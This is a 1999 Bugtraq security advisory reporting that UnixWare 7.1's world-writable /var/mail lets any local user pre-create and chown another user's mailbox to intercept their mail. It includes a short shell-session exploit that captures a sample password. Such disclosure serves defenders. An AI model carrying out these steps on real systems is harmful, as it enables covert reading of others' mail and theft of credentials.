=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Сб, 04 дек 1999  00:03:43

   От: Brock Tellier <btellier@USA.NET>

 Кому: BUGTRAQ@SECURITYFOCUS.COM

 Тема: UnixWare read/modify users' mail

--------------------------------------------------------------------------------




Greetings,



OVERVIEW

Any user can read/modify others' mail.



BACKGROUND

Only UnixWare 7.1 was tested.



DETAILS

Imagine my suprise when I saw that /var/mail was mode 777.  As such, any

user may create a file called /var/mail/<username> with a mode readable by

him and trap all incoming mail.  Afraid of getting caught? chown the file

to <username> (see my advisory on this subject), leaving it still

world-readable, and no one will ever know who did it.  



All of this assumes, of course, that the user has not recieved any mail

yet.  If you keep track of your /etc/passwd file, you can monitor for new

entries and create the files as needed.



This permissions problem obviously opens the door for all sorts of

problems with symlinks and such.  I would imagine that some mail delivery

programs which aren't as smart as sendmail will follow symlinks in

/var/mail.



And as if all this wasn't bad enough, UnixWare's /usr/bin/mail is a BIG

LIE:



bash-2.02$ cat /usr/bin/mail

#!/bin/sh

cat > /dev/null

exit 0

bash-2.02$ 



;)



EXPLOIT



bash-2.02$ id

uid=106(xnec) gid=1(other)

bash-2.02$ pwd

/var/mail

bash-2.02$ touch btellier

bash-2.02$ chown btellier btellier

bash-2.02$ ls -la btellier

-rw-r--r--    1 btellier other             0 Dec  4 07:54 btellier



Now wait for btellier to get some mail...



bash-2.02$ ls -la btellier

-rw-r--r--    1 btellier other           410 Dec  4 07:55 btellier

bash-2.02$ cat btellier

From root Sat Dec  4 07:55:29 1999

Return-Path: root

Received: (from root@localhost) by localhost (8.8.7/UW7.1.0) id HAA04842

for btellier; Sat, 4 Dec 1999 07:55:29 -0600 (CST)

Date: Sat, 4 Dec 1999 07:55:29 -0600 (CST)

From: root@localhost

Message-Id: <199912041355.HAA04842@localhost>

Status: 

X-Status: 

X-SCO-PAD: XXXXXX

X-SCO-UID: 1

Content-Length: 52



your ueber-secure password on 0wned.com is a@f9;se0

bash-2.02$ 



Brock Tellier

UNIX Systems Administrator

Chicago, IL, USA

btellier@usa.net



____________________________________________________________________

Get free email and a permanent address at http://www.netaddress.com/?N=1